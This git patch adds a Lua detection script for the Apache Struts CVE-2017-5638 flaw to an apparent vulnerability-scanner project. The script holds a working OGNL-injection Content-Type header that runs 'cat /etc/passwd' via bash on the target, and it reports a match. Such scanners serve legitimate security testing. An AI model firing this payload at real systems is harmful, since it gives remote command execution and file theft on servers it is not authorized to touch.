From 5159dbc3748fa1cc80bbb9161028d71e17539ca2 Mon Sep 17 00:00:00 2001
From: Mohamed Tarek <mohamednafagr@gmail.com>
Date: Fri, 13 Oct 2023 01:53:55 +0300
Subject: [PATCH] New script for CVE-2017-5638

---
 CVE/CVE-2017-5638.lua | 38 ++++++++++++++++++++++++++++++++++++++
 README.md             |  2 +-
 2 files changed, 39 insertions(+), 1 deletion(-)
 create mode 100644 CVE/CVE-2017-5638.lua

diff --git a/CVE/CVE-2017-5638.lua b/CVE/CVE-2017-5638.lua
new file mode 100644
index 0000000..3dbbae1
--- /dev/null
+++ b/CVE/CVE-2017-5638.lua
@@ -0,0 +1,38 @@
+-- AUTHOR: Mohamed Tarek @0xr00t3d
+-- Reference: https://blog.talosintelligence.com/apache-0-day-exploited/
+
+SCAN_TYPE = 2
+BODY_MATCH = {"root:.*:0:0:"}
+
+local function send_report(resp)
+    Reports:add {
+        name = "CVE-2017-5638",
+        url = resp.url,
+        risk = "Critical",
+        description = "Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.",
+    }
+end
+
+local function scan_cve()
+    local new_url = HttpMessage:url()
+    local headers = {}
+    headers["Content-Type"] = [[%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}]]
+
+    local status, resp = pcall(function()
+        return http:send { url = new_url , headers = headers}
+    end)
+
+    if status ~= true then return end
+    if resp.status ~= 200 then return end
+
+
+    local body = resp.body
+
+     if Matcher:match_body_once(body, BODY_MATCH) then
+         send_report(resp)
+     end
+end
+
+function main()
+    scan_cve()
+end
diff --git a/README.md b/README.md
index aa4e242..08839d3 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,7 @@ We're developing scripts for famous CVEs, like CVE-2014-2321, CVE-2019-11248, CV
 | CVE-2022-0381.lua            | :heavy_check_mark: Finished  |
 | CVE-2022-1234.lua            | :hourglass_flowing_sand: In progress |
 | SSH Bruteforce               | :hourglass_flowing_sand: In progress |
-| CVE-2017-5638 Apache Struts  | :hourglass_flowing_sand: In progress |
+| CVE-2017-5638 Apache Struts  | :heavy_check_mark: Finished|
 | CVE-2017-11882 Microsoft     | :hourglass_flowing_sand: In progress |
 | CVE-2018-7600 Drupal         | :hourglass_flowing_sand: In progress |
 | CVE-2018-8174 Windows        | :hourglass_flowing_sand: In progress |